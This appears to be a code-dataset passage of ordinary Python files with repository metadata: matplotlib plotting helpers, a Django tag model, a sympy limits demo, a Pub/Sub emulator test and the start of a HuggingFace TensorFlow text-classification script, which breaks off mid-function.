    """Create a figure and its axes.

    :param diff: when True, build a tall main panel plus a shorter
        difference panel below it (2:1 height ratio) sharing the x axis;
        otherwise create a single axis.
    :return: (figure, axes) where axes is a list (main axis first).
    """
    fig = plt.figure()
    axes = []
    if diff:
        gs = gridspec.GridSpec(2, 1, height_ratios=[2,1])
        main_axis = plt.subplot(gs[0])
        # NOTE(review): plt.subplot(gs[0]) is invoked twice; this relies on
        # pyplot returning the already-created axis for identical arguments.
        # Confirm, or append `main_axis` directly.
        axes.append(plt.subplot(gs[0]))
        axes.append(plt.subplot(gs[1], sharex=main_axis))
    else:
        axes.append(plt.subplot())
    return fig, axes
def layout_main_and_diff_axis(fig, axes):
    """Join a (main, diff) axis pair vertically with no gap.

    Hides the main axis' bottom spine and x tick labels so the shared
    x axis is only rendered on the lower (diff) panel.
    """
    main_axis, diff_axis = axes
    fig.subplots_adjust(hspace=0.0)
    main_axis.spines['bottom'].set_visible(False)
    plt.setp(main_axis.get_xticklabels(), visible=False)
    main_axis.set_xlabel('')
    diff_axis.xaxis.tick_bottom()
def configure_legend_on_axis(axis, title='', loc='best', borderpad=1.2, draws_background=True):
    """Create and style the legend for an axis.

    :param draws_background: draw a light grey, slightly transparent,
        rounded frame behind the legend.
    Legend line handles are forced fully opaque regardless of plot alpha.
    """
    legend = axis.legend(loc=loc,
                         title=title,
                         borderaxespad=borderpad,
                         framealpha=0.8,
                         frameon=draws_background,
                         fancybox=draws_background)
    legend.get_frame().set_color((0.96,0.96,0.96))
    for line in legend.get_lines():
        line.set_alpha(1.0)
def add_annotation_on_axis(axis, annotation, loc='upper right', borderpad=1.2):
    """Place a frameless text annotation on the axis.

    :param loc: legend-style location name; translated to the integer
        location code that AnchoredText expects.
    """
    codes = {'upper right': 1, 'upper left': 2, 'lower left': 3, 'lower right': 4,
             'right': 5, 'center left': 6,'center right': 7,
             'lower center': 8, 'upper center': 9, 'center': 10}
    at = AnchoredText(annotation,
                      codes[loc],
                      frameon=False,
                      borderpad=borderpad,
                      prop=dict(linespacing=2.5))
    axis.add_artist(at)
def get_major_ticks_within_view_interval(axis):
    """Return the major ticks whose locations fall inside the axis view interval."""
    interval = axis.get_view_interval()
    tick_locations = axis.get_major_locator()()
    return [
        tick
        for tick, location in zip(axis.get_major_ticks(), tick_locations)
        if mtransforms.interval_contains(interval, location)
    ]
def set_figure_size_with_width(width):
    """Set the default matplotlib figure size from a width given in points."""
    params = {'figure.figsize': figure_size_from_width(width)}
    plt.rcParams.update(params)
def figure_size_from_width(width):
    """Return a [width, height] figure size in inches given a width in points.

    The height is derived from the width via the golden ratio.
    """
    inches_per_point = 1.0 / 72.27  # TeX points per inch
    golden_mean = (math.sqrt(5) - 1.0) / 2.0
    width_inches = width * inches_per_point
    height_inches = width_inches * golden_mean
    return [width_inches, height_inches]
| 37.328571 | 95 | 0.643705 | import math
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import matplotlib.transforms as mtransforms
from mpl_toolkits.axes_grid.anchored_artists import AnchoredText
def setup_axes(diff=False):
    """Create a figure and its axes; with diff=True add a 2:1 main/diff panel pair sharing x."""
    fig = plt.figure()
    axes = []
    if diff:
        gs = gridspec.GridSpec(2, 1, height_ratios=[2,1])
        main_axis = plt.subplot(gs[0])
        # NOTE(review): plt.subplot(gs[0]) is called twice - presumably pyplot
        # returns the existing axis for identical args; confirm.
        axes.append(plt.subplot(gs[0]))
        axes.append(plt.subplot(gs[1], sharex=main_axis))
    else:
        axes.append(plt.subplot())
    return fig, axes
def layout_main_and_diff_axis(fig, axes):
    """Join a (main, diff) axis pair vertically with no gap; x labels only on the diff panel."""
    main_axis, diff_axis = axes
    fig.subplots_adjust(hspace=0.0)
    main_axis.spines['bottom'].set_visible(False)
    plt.setp(main_axis.get_xticklabels(), visible=False)
    main_axis.set_xlabel('')
    diff_axis.xaxis.tick_bottom()
def configure_legend_on_axis(axis, title='', loc='best', borderpad=1.2, draws_background=True):
    """Create and style the legend for an axis; handles are forced fully opaque."""
    legend = axis.legend(loc=loc,
                         title=title,
                         borderaxespad=borderpad,
                         framealpha=0.8,
                         frameon=draws_background,
                         fancybox=draws_background)
    legend.get_frame().set_color((0.96,0.96,0.96))
    for line in legend.get_lines():
        line.set_alpha(1.0)
def add_annotation_on_axis(axis, annotation, loc='upper right', borderpad=1.2):
    """Place a frameless text annotation on the axis; `loc` uses legend-style names."""
    # Mapping from legend location names to AnchoredText integer codes.
    codes = {'upper right': 1, 'upper left': 2, 'lower left': 3, 'lower right': 4,
             'right': 5, 'center left': 6,'center right': 7,
             'lower center': 8, 'upper center': 9, 'center': 10}
    at = AnchoredText(annotation,
                      codes[loc],
                      frameon=False,
                      borderpad=borderpad,
                      prop=dict(linespacing=2.5))
    axis.add_artist(at)
def get_major_ticks_within_view_interval(axis):
    """Return the major ticks whose locations fall inside the axis view interval."""
    interval = axis.get_view_interval()
    ticks_in_view_interval = []
    for tick, loc in zip(axis.get_major_ticks(),
                         axis.get_major_locator()()):
        if mtransforms.interval_contains(interval, loc):
            ticks_in_view_interval.append(tick)
    return ticks_in_view_interval
def set_figure_size_with_width(width):
    """Set the default matplotlib figure size from a width given in points."""
    params = {'figure.figsize': figure_size_from_width(width)}
    plt.rcParams.update(params)
def figure_size_from_width(width):
    """Return a [width, height] figure size in inches (golden-ratio height) for a width in points."""
    inches_per_point = 1.0/72.27
    golden_mean = (math.sqrt(5)-1.0)/2.0
    inches_width = width * inches_per_point
    fig_height = inches_width*golden_mean
    return [inches_width,fig_height]
| true | true |
f725efcbce1ccf39d91c665102551ed46f4594c4 | 187 | py | Python | Introduction_to_python/Module 2 Code Files/greater_than_exercise.py | leogithubid/data-analysis-using-python | 531e4fb3a05393c94979b5c571cda0f107cb5030 | [
"MIT"
] | null | null | null | Introduction_to_python/Module 2 Code Files/greater_than_exercise.py | leogithubid/data-analysis-using-python | 531e4fb3a05393c94979b5c571cda0f107cb5030 | [
"MIT"
] | null | null | null | Introduction_to_python/Module 2 Code Files/greater_than_exercise.py | leogithubid/data-analysis-using-python | 531e4fb3a05393c94979b5c571cda0f107cb5030 | [
"MIT"
def greater_than(x, y):
    """Return True if x is strictly greater than y."""
    # The comparison already yields a boolean; no if/else branching needed.
    return x > y


a = 2
b = 3
result = greater_than(a, b)
print("{} is greater than {}: {}".format(a, b, result))
| 15.583333 | 55 | 0.545455 | def greater_than(x, y):
if x > y:
return True
else:
return False
a = 2
b = 3
result = greater_than(a, b)
print("{} is greater than {}: {}".format(a, b, result))
| true | true |
f725f033c68129465884ebe3416f353fef5cfe99 | 1,048 | py | Python | habitat/food/models/tag.py | matrach/habitatOS | 1ae2a3caf6f279cf6d6d20bcd81f24d50f61d7d3 | [
"MIT"
] | 1 | 2021-02-01T19:04:39.000Z | 2021-02-01T19:04:39.000Z | habitat/food/models/tag.py | matrach/habitatOS | 1ae2a3caf6f279cf6d6d20bcd81f24d50f61d7d3 | [
"MIT"
] | null | null | null | habitat/food/models/tag.py | matrach/habitatOS | 1ae2a3caf6f279cf6d6d20bcd81f24d50f61d7d3 | [
"MIT"
] | null | null | null | from django.contrib import admin
from django.db import models
from django.utils.text import slugify
from django.utils.translation import ugettext_lazy as _
class Tag(models.Model):
    """Label attached to a product, plan or meal.

    The slug is regenerated from the name on every save.
    """

    # Context the tag applies to; stored in the `type` field below.
    TYPE_CHOICES = [
        ('product', _('Product')),
        ('plan', _('Plan')),
        ('meal', _('Meal')),
    ]
    name = models.CharField(verbose_name=_('Name'), max_length=255, db_index=True, default=None)
    # Not editable in forms - derived from `name` in save().
    slug = models.SlugField(verbose_name=_('Slug'), editable=False, default=None)
    # NOTE: the field name `type` shadows the builtin inside this class body.
    type = models.CharField(verbose_name=_('Type'), max_length=30, choices=TYPE_CHOICES, default='product')

    def __str__(self):
        return f'{self.name}'

    def save(self, *args, **kwargs):
        # Keep the slug in sync with the (possibly edited) name.
        self.slug = slugify(self.name)
        super().save(*args, **kwargs)

    class Meta:
        ordering = ['name']
        verbose_name = _('Tag')
        verbose_name_plural = _('Tags')

    class Admin(admin.ModelAdmin):
        # Admin options - presumably registered by the project's admin
        # module; confirm against the registration site.
        list_display = ['name', 'type']
        ordering = ['name']
        search_fields = ['^name']
        list_editable = ['type']
| 29.942857 | 107 | 0.623092 | from django.contrib import admin
from django.db import models
from django.utils.text import slugify
from django.utils.translation import ugettext_lazy as _
class Tag(models.Model):
    """Label attached to a product, plan or meal; slug is derived from name on save."""

    TYPE_CHOICES = [
        ('product', _('Product')),
        ('plan', _('Plan')),
        ('meal', _('Meal')),
    ]
    name = models.CharField(verbose_name=_('Name'), max_length=255, db_index=True, default=None)
    slug = models.SlugField(verbose_name=_('Slug'), editable=False, default=None)
    type = models.CharField(verbose_name=_('Type'), max_length=30, choices=TYPE_CHOICES, default='product')

    def __str__(self):
        return f'{self.name}'

    def save(self, *args, **kwargs):
        # Keep the slug in sync with the (possibly edited) name.
        self.slug = slugify(self.name)
        super().save(*args, **kwargs)

    class Meta:
        ordering = ['name']
        verbose_name = _('Tag')
        verbose_name_plural = _('Tags')

    class Admin(admin.ModelAdmin):
        list_display = ['name', 'type']
        ordering = ['name']
        search_fields = ['^name']
        list_editable = ['type']
| true | true |
f725f048c2db89cfc4013eb72273fee66ea06245 | 835 | py | Python | examples/beginner/limits_examples.py | msgoff/sympy | 1e7daef7514902f5e89718fa957b7b36c6669a10 | [
"BSD-3-Clause"
] | null | null | null | examples/beginner/limits_examples.py | msgoff/sympy | 1e7daef7514902f5e89718fa957b7b36c6669a10 | [
"BSD-3-Clause"
] | null | null | null | examples/beginner/limits_examples.py | msgoff/sympy | 1e7daef7514902f5e89718fa957b7b36c6669a10 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
"""Limits Example
Demonstrates limits.
"""
from sympy import exp, log, Symbol, Rational, sin, limit, sqrt, oo
def sqrt3(x):
    """Return the symbolic cube root of x, i.e. x**(1/3)."""
    return x ** Rational(1, 3)
def show(computed, correct):
    """Print a computed limit next to its expected closed-form value."""
    print("computed:", computed, "correct:", correct)
def main():
    """Evaluate a collection of classic limits and print each beside its known exact value."""
    x = Symbol("x")
    show(limit(sqrt(x ** 2 - 5 * x + 6) - x, x, oo), -Rational(5) / 2)
    show(limit(x * (sqrt(x ** 2 + 1) - x), x, oo), Rational(1) / 2)
    show(limit(x - sqrt3(x ** 3 - 1), x, oo), Rational(0))
    show(limit(log(1 + exp(x)) / x, x, -oo), Rational(0))
    show(limit(log(1 + exp(x)) / x, x, oo), Rational(1))
    show(limit(sin(3 * x) / x, x, 0), Rational(3))
    show(limit(sin(5 * x) / sin(2 * x), x, 0), Rational(5) / 2)
    show(limit(((x - 1) / (x + 1)) ** x, x, oo), exp(-2))
if __name__ == "__main__":
    main()
| 20.365854 | 70 | 0.534132 |
from sympy import exp, log, Symbol, Rational, sin, limit, sqrt, oo
def sqrt3(x):
    """Return the symbolic cube root of x, i.e. x**(1/3)."""
    return x ** Rational(1, 3)
def show(computed, correct):
    """Print a computed limit next to its expected closed-form value."""
    print("computed:", computed, "correct:", correct)
def main():
    """Evaluate a collection of classic limits and print each beside its known exact value."""
    x = Symbol("x")
    show(limit(sqrt(x ** 2 - 5 * x + 6) - x, x, oo), -Rational(5) / 2)
    show(limit(x * (sqrt(x ** 2 + 1) - x), x, oo), Rational(1) / 2)
    show(limit(x - sqrt3(x ** 3 - 1), x, oo), Rational(0))
    show(limit(log(1 + exp(x)) / x, x, -oo), Rational(0))
    show(limit(log(1 + exp(x)) / x, x, oo), Rational(1))
    show(limit(sin(3 * x) / x, x, 0), Rational(3))
    show(limit(sin(5 * x) / sin(2 * x), x, 0), Rational(5) / 2)
    show(limit(((x - 1) / (x + 1)) ** x, x, oo), exp(-2))
if __name__ == "__main__":
    main()
| true | true |
f725f160fe888789fd6fe5f15c095f239fd5e3ba | 4,182 | py | Python | tests/service_test.py | drmobile/pubsub-broker | e5bfface5be95b667a124ac3e47b6683ee25888c | [
"Apache-2.0"
] | 1 | 2020-11-13T16:04:04.000Z | 2020-11-13T16:04:04.000Z | tests/service_test.py | drmobile/pubsub-broker | e5bfface5be95b667a124ac3e47b6683ee25888c | [
"Apache-2.0"
] | 3 | 2018-07-20T09:38:56.000Z | 2018-12-25T06:18:29.000Z | tests/service_test.py | drmobile/pubsub-broker | e5bfface5be95b667a124ac3e47b6683ee25888c | [
"Apache-2.0"
] | 3 | 2018-04-10T10:37:27.000Z | 2018-12-25T06:05:19.000Z | # coding=utf-8
#
import time
import copy
import pytest
import logging
import unittest
import threading
import concurrent.futures
from multiprocessing import Manager
from soocii_pubsub_lib import pubsub_client, sub_service
# ========== Initial Logger ==========
logging.basicConfig(
level=logging.DEBUG,
format='[%(asctime)-15s][%(thread)d][%(levelname)-5s][%(filename)s][%(funcName)s#%(lineno)d] %(message)s')
logger = logging.getLogger(__name__)
# ====================================
# normal subscribe
@pytest.mark.usefixtures("start_emulator")
class NormalSubscribeTests(unittest.TestCase):
    """End-to-end publish/subscribe test against the Pub/Sub emulator.

    A publisher runs in a worker thread while the subscription service runs
    on the main thread; a 'waitter' thread shuts the service down after a
    fixed delay so the blocking service loop terminates.
    """

    def setUp(self):
        # Fixed fake identifiers accepted by the emulator.
        self.project = 'fake-project'
        self.cred = None
        self.topic = 'fake-topic'
        self.published_message_id = None
        # self.received_message = None
        # self.received_message_counts = 0
        self.service = None
        # shared variables due to multi-threading
        manager = Manager()
        self.lock = threading.Lock()
        self.received_message = manager.dict()
        self.received_message_counts = manager.Value('i', 0)

    def tearDown(self):
        pass

    def __on_published(self, message_id):
        # Publisher callback: remember the id of the last published message.
        logger.info('message is published with message id: {}'.format(message_id))
        self.published_message_id = message_id

    def __on_received(self, message):
        # Subscriber callback: record the payload and bump the counter.
        try:
            with self.lock:
                logger.info('message is received with payload: {}'.format(message))
                # NOTE(review): this rebinds the attribute, discarding the
                # manager.dict() created in setUp - works because the
                # subscriber shares memory with the test (threads), but the
                # Manager indirection is then unused. Confirm intent.
                self.received_message = copy.deepcopy(message)
                self.received_message_counts.value = self.received_message_counts.value + 1
                logger.info('received_message: {}, received_message_counts: {}'.format(self.received_message, self.received_message_counts.value))
        except Exception as e:
            logger.exception('unexpected exception was caughted: {}'.format(e))
        # ack message
        logger.info('ack message')
        return True

    def __publisher(self):
        # prepare publisher
        publisher = pubsub_client.PublisherClient(self.project, self.cred)
        # get configuration of the topic before sending request
        exception_caughted = False
        try:
            publisher.get_topic(self.topic)
        except Exception as e:
            exception_caughted = True
            logger.exception('unexpected exception was caughted: {}'.format(e))
        self.assertFalse(exception_caughted)
        # publish bytes
        logger.info('start publishing message')
        for _ in range(5):
            publisher.publish(self.topic, b'bytes data', callback=lambda message_id: self.__on_published(message_id))
            time.sleep(0.5)

    def __subscriber(self):
        # prepare subscriber
        self.subscription = pubsub_client.SubscribeClient(self.project, self.cred)
        self.subscription.create_subscription(self.topic, 'fake-subscription')
        self.service = sub_service.SubscriptionService(self.subscription)
        logger.info('start subscribing message')
        # Blocks until __waitter() calls service.shutdown().
        self.service.run(callback=lambda message: self.__on_received(message))

    def __waitter(self):
        # wait for callback
        time.sleep(10)
        self.service.shutdown()

    # @pytest.mark.skip(reason="not reliable in travis CI")
    def test_subscribe_message(self):
        # prepare publisher
        publisher = pubsub_client.PublisherClient(self.project, self.cred)
        publisher.create_topic(self.topic)
        # prepare subscriber
        self.subscription = pubsub_client.SubscribeClient(self.project, self.cred)
        self.subscription.create_subscription(self.topic, 'fake-subscription')
        with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
            executor.submit(lambda: self.__waitter())
            self.__publisher()
            # subscriber service MUST run in main thread
            self.__subscriber()
        # verify if message has been received
        # NOTE(review): the `is not None` check is always true (the attribute
        # is set in setUp); the equality asserts below are the real checks.
        assert self.received_message is not None
        assert self.received_message['data'] == b'bytes data'
        assert self.received_message['attributes'] == {}
        assert self.received_message_counts.value == 5
| 38.018182 | 146 | 0.662602 |
import time
import copy
import pytest
import logging
import unittest
import threading
import concurrent.futures
from multiprocessing import Manager
from soocii_pubsub_lib import pubsub_client, sub_service
logging.basicConfig(
level=logging.DEBUG,
format='[%(asctime)-15s][%(thread)d][%(levelname)-5s][%(filename)s][%(funcName)s#%(lineno)d] %(message)s')
logger = logging.getLogger(__name__)
@pytest.mark.usefixtures("start_emulator")
class NormalSubscribeTests(unittest.TestCase):
    """End-to-end publish/subscribe test against the Pub/Sub emulator.

    A publisher runs in a worker thread while the subscription service runs
    on the main thread; a 'waitter' thread shuts the service down.
    """

    def setUp(self):
        self.project = 'fake-project'
        self.cred = None
        self.topic = 'fake-topic'
        self.published_message_id = None
        self.service = None
        # Shared state guarded by a lock; callbacks run on other threads.
        manager = Manager()
        self.lock = threading.Lock()
        self.received_message = manager.dict()
        self.received_message_counts = manager.Value('i', 0)

    def tearDown(self):
        pass

    def __on_published(self, message_id):
        # Publisher callback: remember the id of the last published message.
        logger.info('message is published with message id: {}'.format(message_id))
        self.published_message_id = message_id

    def __on_received(self, message):
        # Subscriber callback: record the payload, bump the counter, ack.
        try:
            with self.lock:
                logger.info('message is received with payload: {}'.format(message))
                self.received_message = copy.deepcopy(message)
                self.received_message_counts.value = self.received_message_counts.value + 1
                logger.info('received_message: {}, received_message_counts: {}'.format(self.received_message, self.received_message_counts.value))
        except Exception as e:
            logger.exception('unexpected exception was caughted: {}'.format(e))
        logger.info('ack message')
        return True

    def __publisher(self):
        # Verify the topic exists, then publish five byte payloads.
        publisher = pubsub_client.PublisherClient(self.project, self.cred)
        exception_caughted = False
        try:
            publisher.get_topic(self.topic)
        except Exception as e:
            exception_caughted = True
            logger.exception('unexpected exception was caughted: {}'.format(e))
        self.assertFalse(exception_caughted)
        logger.info('start publishing message')
        for _ in range(5):
            publisher.publish(self.topic, b'bytes data', callback=lambda message_id: self.__on_published(message_id))
            time.sleep(0.5)

    def __subscriber(self):
        # Blocks until __waitter() calls service.shutdown().
        self.subscription = pubsub_client.SubscribeClient(self.project, self.cred)
        self.subscription.create_subscription(self.topic, 'fake-subscription')
        self.service = sub_service.SubscriptionService(self.subscription)
        logger.info('start subscribing message')
        self.service.run(callback=lambda message: self.__on_received(message))

    def __waitter(self):
        # Allow 10s for delivery, then stop the blocking service loop.
        time.sleep(10)
        self.service.shutdown()

    def test_subscribe_message(self):
        publisher = pubsub_client.PublisherClient(self.project, self.cred)
        publisher.create_topic(self.topic)
        self.subscription = pubsub_client.SubscribeClient(self.project, self.cred)
        self.subscription.create_subscription(self.topic, 'fake-subscription')
        with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
            executor.submit(lambda: self.__waitter())
            self.__publisher()
            # The subscriber service must run on the main thread.
            self.__subscriber()
        # All five published messages should have been received and acked.
        assert self.received_message is not None
        assert self.received_message['data'] == b'bytes data'
        assert self.received_message['attributes'] == {}
        assert self.received_message_counts.value == 5
| true | true |
f725f1c930f026fc5ad6709114adb3ed8d9d5763 | 23,200 | py | Python | examples/tensorflow/text-classification/run_text_classification.py | SeanNaren/transformers | 8d43c71a1ca3ad322cc45008eb66a5611f1e017e | [
"Apache-2.0"
] | 1 | 2021-04-10T07:59:12.000Z | 2021-04-10T07:59:12.000Z | examples/tensorflow/text-classification/run_text_classification.py | SeanNaren/transformers | 8d43c71a1ca3ad322cc45008eb66a5611f1e017e | [
"Apache-2.0"
] | null | null | null | examples/tensorflow/text-classification/run_text_classification.py | SeanNaren/transformers | 8d43c71a1ca3ad322cc45008eb66a5611f1e017e | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# coding=utf-8
# Copyright 2021 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Fine-tuning the library models for sequence classification."""
# You can also adapt this script on your own text classification task. Pointers for this are left as comments.
import logging
import os
import random
import sys
from dataclasses import dataclass, field
from math import ceil
from pathlib import Path
from typing import Optional
import numpy as np
from datasets import load_dataset
from transformers import (
AutoConfig,
AutoTokenizer,
HfArgumentParser,
PretrainedConfig,
TFAutoModelForSequenceClassification,
TrainingArguments,
set_seed,
)
from transformers.file_utils import CONFIG_NAME, TF2_WEIGHTS_NAME
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "1" # Reduce the amount of console output from TF
import tensorflow as tf # noqa: E402
logger = logging.getLogger(__name__)
# region Helper classes
class DataSequence(tf.keras.utils.Sequence):
    """Keras Sequence that batches a tokenized `datasets` split on the fly.

    Compared to materializing the whole dataset as padded Numpy/TF arrays,
    this pads each batch only to the longest example *in that batch* and
    never requires the full dataset in memory at once. If those constraints
    don't matter for you, you can skip the Sequence object in your own code.
    """

    def __init__(self, dataset, non_label_column_names, batch_size, labels, shuffle=True):
        super().__init__()
        # Retain all of the columns not present in the original data - these
        # are the ones added by the tokenizer.
        self.data = {
            key: dataset[key]
            for key in dataset.features.keys()
            if key not in non_label_column_names and key != "label"
        }
        data_lengths = {len(array) for array in self.data.values()}
        assert len(data_lengths) == 1, "Dataset arrays differ in length!"
        self.data_length = data_lengths.pop()
        self.num_batches = ceil(self.data_length / batch_size)
        if labels:
            self.labels = np.array(dataset["label"])
            assert len(self.labels) == self.data_length, "Labels not the same length as input arrays!"
        else:
            self.labels = None
        self.batch_size = batch_size
        self.shuffle = shuffle
        if self.shuffle:
            # Shuffle the data order
            self.permutation = np.random.permutation(self.data_length)
        else:
            self.permutation = None

    def on_epoch_end(self):
        # If we're shuffling, reshuffle the data order after each epoch
        if self.shuffle:
            self.permutation = np.random.permutation(self.data_length)

    def __getitem__(self, item):
        """Return one batch: inputs dict, or (inputs dict, labels array)."""
        # Note that this yields a batch, not a single sample
        batch_start = item * self.batch_size
        # Clamp the end index: the final batch may be partial, and an
        # unclamped np.arange() would index past the end of the data arrays
        # when shuffle=False. (Slicing the permutation already truncated
        # silently, so the shuffled path was unaffected.)
        batch_end = min((item + 1) * self.batch_size, self.data_length)
        if self.shuffle:
            data_indices = self.permutation[batch_start:batch_end]
        else:
            data_indices = np.arange(batch_start, batch_end)
        # We want to pad the data as little as possible, so we only pad each
        # batch to the maximum length within that batch. We do that by
        # stacking the variable-length inputs into a ragged tensor and then
        # densifying it.
        batch_input = {
            key: tf.ragged.constant([data[i] for i in data_indices]).to_tensor() for key, data in self.data.items()
        }
        if self.labels is None:
            return batch_input
        else:
            batch_labels = self.labels[data_indices]
            return batch_input, batch_labels

    def __len__(self):
        return self.num_batches
class SavePretrainedCallback(tf.keras.callbacks.Callback):
    """Keras callback that invokes the model's ``save_pretrained()`` after
    each epoch, writing both the weights and the metadata needed to reload
    the model as a pretrained checkpoint later."""

    def __init__(self, output_dir, **kwargs):
        super().__init__()
        self.output_dir = output_dir

    def on_epoch_end(self, epoch, logs=None):
        self.model.save_pretrained(self.output_dir)
# endregion
# region Command-line arguments
@dataclass
class DataTrainingArguments:
    """
    Arguments pertaining to what data we are going to input our model for training and eval.

    Using `HfArgumentParser` we can turn this class
    into argparse arguments to be able to specify them on
    the command line.
    """

    train_file: Optional[str] = field(
        default=None, metadata={"help": "A csv or a json file containing the training data."}
    )
    validation_file: Optional[str] = field(
        default=None, metadata={"help": "A csv or a json file containing the validation data."}
    )
    test_file: Optional[str] = field(default=None, metadata={"help": "A csv or a json file containing the test data."})
    max_seq_length: int = field(
        default=128,
        metadata={
            "help": "The maximum total input sequence length after tokenization. Sequences longer "
            "than this will be truncated, sequences shorter will be padded."
        },
    )
    overwrite_cache: bool = field(
        default=False, metadata={"help": "Overwrite the cached preprocessed datasets or not."}
    )
    pad_to_max_length: bool = field(
        default=False,
        metadata={
            "help": "Whether to pad all samples to `max_seq_length`. "
            "If False, will pad the samples dynamically when batching to the maximum length in the batch."
        },
    )
    max_train_samples: Optional[int] = field(
        default=None,
        metadata={
            "help": "For debugging purposes or quicker training, truncate the number of training examples to this "
            "value if set."
        },
    )
    max_eval_samples: Optional[int] = field(
        default=None,
        metadata={
            "help": "For debugging purposes or quicker training, truncate the number of evaluation examples to this "
            "value if set."
        },
    )
    max_predict_samples: Optional[int] = field(
        default=None,
        metadata={
            "help": "For debugging purposes or quicker training, truncate the number of predict examples to this "
            "value if set."
        },
    )

    def __post_init__(self):
        # Validate that at least one data file was supplied and that all the
        # supplied files share a single supported extension. Raise ValueError
        # instead of `assert`, which is silently stripped under `python -O`.
        train_extension = self.train_file.split(".")[-1].lower() if self.train_file is not None else None
        validation_extension = (
            self.validation_file.split(".")[-1].lower() if self.validation_file is not None else None
        )
        test_extension = self.test_file.split(".")[-1].lower() if self.test_file is not None else None
        extensions = {train_extension, validation_extension, test_extension}
        extensions.discard(None)
        if len(extensions) == 0:
            raise ValueError("Need to supply at least one of --train_file, --validation_file or --test_file!")
        if len(extensions) != 1:
            raise ValueError("All input files should have the same file extension, either csv or json!")
        if "csv" not in extensions and "json" not in extensions:
            raise ValueError("Input files should have either .csv or .json extensions!")
        self.input_file_extension = extensions.pop()
@dataclass
class ModelArguments:
    """
    Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.
    """

    # Required positional field: local checkpoint path or Hub model id.
    model_name_or_path: str = field(
        metadata={"help": "Path to pretrained model or model identifier from huggingface.co/models"}
    )
    config_name: Optional[str] = field(
        default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
    )
    tokenizer_name: Optional[str] = field(
        default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
    )
    cache_dir: Optional[str] = field(
        default=None,
        metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"},
    )
    model_revision: str = field(
        default="main",
        metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
    )
    use_auth_token: bool = field(
        default=False,
        metadata={
            "help": "Will use the token generated when running `transformers-cli login` (necessary to use this script "
            "with private models)."
        },
    )
# endregion
def main():
    """Fine-tune, evaluate and/or predict with a TF sequence-classification model on local CSV/JSON data."""
    # region Argument parsing
    # See all possible arguments in src/transformers/training_args.py
    # or by passing the --help flag to this script.
    # We now keep distinct sets of args, for a cleaner separation of concerns.
    parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments))
    if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
        # If we pass only one argument to the script and it's the path to a json file,
        # let's parse it to get our arguments.
        model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
    else:
        model_args, data_args, training_args = parser.parse_args_into_dataclasses()
    output_dir = Path(training_args.output_dir)
    output_dir.mkdir(parents=True, exist_ok=True)
    # endregion

    # region Checkpoints
    # Detecting last checkpoint.
    checkpoint = None
    if len(os.listdir(training_args.output_dir)) > 0 and not training_args.overwrite_output_dir:
        if (output_dir / CONFIG_NAME).is_file() and (output_dir / TF2_WEIGHTS_NAME).is_file():
            checkpoint = output_dir
            logger.info(
                f"Checkpoint detected, resuming training from checkpoint in {training_args.output_dir}. To avoid this"
                " behavior, change the `--output_dir` or add `--overwrite_output_dir` to train from scratch."
            )
        else:
            raise ValueError(
                f"Output directory ({training_args.output_dir}) already exists and is not empty. "
                "Use --overwrite_output_dir to continue regardless."
            )
    # endregion

    # region Logging
    logging.basicConfig(
        format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
        datefmt="%m/%d/%Y %H:%M:%S",
        handlers=[logging.StreamHandler(sys.stdout)],
    )
    logger.setLevel(logging.INFO)
    logger.info(f"Training/evaluation parameters {training_args}")
    # endregion

    # region Loading data
    # For CSV/JSON files, this script will use the 'label' field as the label and the 'sentence1' and optionally
    # 'sentence2' fields as inputs if they exist. If not, the first two fields not named label are used if at least two
    # columns are provided. Note that the term 'sentence' can be slightly misleading, as they often contain more than
    # a single grammatical sentence, when the task requires it.
    #
    # If the CSVs/JSONs contain only one non-label column, the script does single sentence classification on this
    # single column. You can easily tweak this behavior (see below)
    #
    # In distributed training, the load_dataset function guarantee that only one local process can concurrently
    # download the dataset.
    data_files = {"train": data_args.train_file, "validation": data_args.validation_file, "test": data_args.test_file}
    data_files = {key: file for key, file in data_files.items() if file is not None}
    for key in data_files.keys():
        logger.info(f"Loading a local file for {key}: {data_files[key]}")
    if data_args.input_file_extension == "csv":
        # Loading a dataset from local csv files
        datasets = load_dataset("csv", data_files=data_files, cache_dir=model_args.cache_dir)
    else:
        # Loading a dataset from local json files
        datasets = load_dataset("json", data_files=data_files, cache_dir=model_args.cache_dir)
    # See more about loading any type of standard or custom dataset at
    # https://huggingface.co/docs/datasets/loading_datasets.html.
    # endregion

    # region Label preprocessing
    # If you've passed us a training set, we try to infer your labels from it
    if "train" in datasets:
        # By default we assume that if your label column looks like a float then you're doing regression,
        # and if not then you're doing classification. This is something you may want to change!
        is_regression = datasets["train"].features["label"].dtype in ["float32", "float64"]
        if is_regression:
            num_labels = 1
        else:
            # A useful fast method:
            # https://huggingface.co/docs/datasets/package_reference/main_classes.html#datasets.Dataset.unique
            label_list = datasets["train"].unique("label")
            label_list.sort()  # Let's sort it for determinism
            num_labels = len(label_list)
    # If you haven't passed a training set, we read label info from the saved model (this happens later)
    else:
        num_labels = None
        label_list = None
        is_regression = None
    # endregion

    # region Load pretrained model and tokenizer
    # Set seed before initializing model
    set_seed(training_args.seed)
    #
    # In distributed training, the .from_pretrained methods guarantee that only one local process can concurrently
    # download model & vocab.
    if checkpoint is not None:
        config_path = training_args.output_dir
    elif model_args.config_name:
        config_path = model_args.config_name
    else:
        config_path = model_args.model_name_or_path
    if num_labels is not None:
